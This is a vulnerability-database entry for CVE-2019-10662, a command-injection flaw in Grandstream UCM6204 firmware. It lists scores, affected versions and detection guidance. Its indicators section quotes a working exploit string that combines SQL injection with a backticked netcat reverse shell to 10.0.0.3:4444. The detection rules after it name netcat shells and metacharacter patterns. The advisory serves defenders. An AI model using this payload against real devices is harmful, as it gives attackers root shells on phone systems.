CVE-2019-10662
published 2019-03-30CVE-2019-10662: Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig…
PriorityP272high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
43.76%
98.6th percentile
Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| grandstream | ucm6204_firmware | < 1.0.19.20 | 1.0.19.20 |
Detection & IOCsextracted from sources · hover to see the quote
command/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `↗
- →Monitor HTTP requests to the /cgi? URI containing shell metacharacters (backticks, semicolons, ${IFS}) in the backupUCMConfig parameter, indicative of CVE-2019-10662 exploitation attempts. ↗
- →Detect SQL injection payloads combined with shell metacharacters in the username field of the Forgot Password / sendPasswordEmail function, particularly patterns matching `' or 1=1--` followed by backtick-enclosed nc/shell commands. ↗
- →Alert on process execution of sendMail.py invoked via popen/shell with attacker-controlled arguments, especially if followed by nc (netcat) spawning a reverse shell as root. ↗
- →Flag Grandstream UCM62xx devices running firmware versions below 1.0.19.20 as vulnerable to authenticated command injection via CVE-2019-10662. ↗
- ·The Metasploit module targets the unauthenticated exploitation path (CVE-2020-5722 + command injection) and is scoped to UCM62xx firmware versions before 1.0.19.20; detections should account for both authenticated (CVE-2019-10662, /cgi? endpoint) and unauthenticated (Forgot Password endpoint) attack surfaces. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
2019-03-30
Published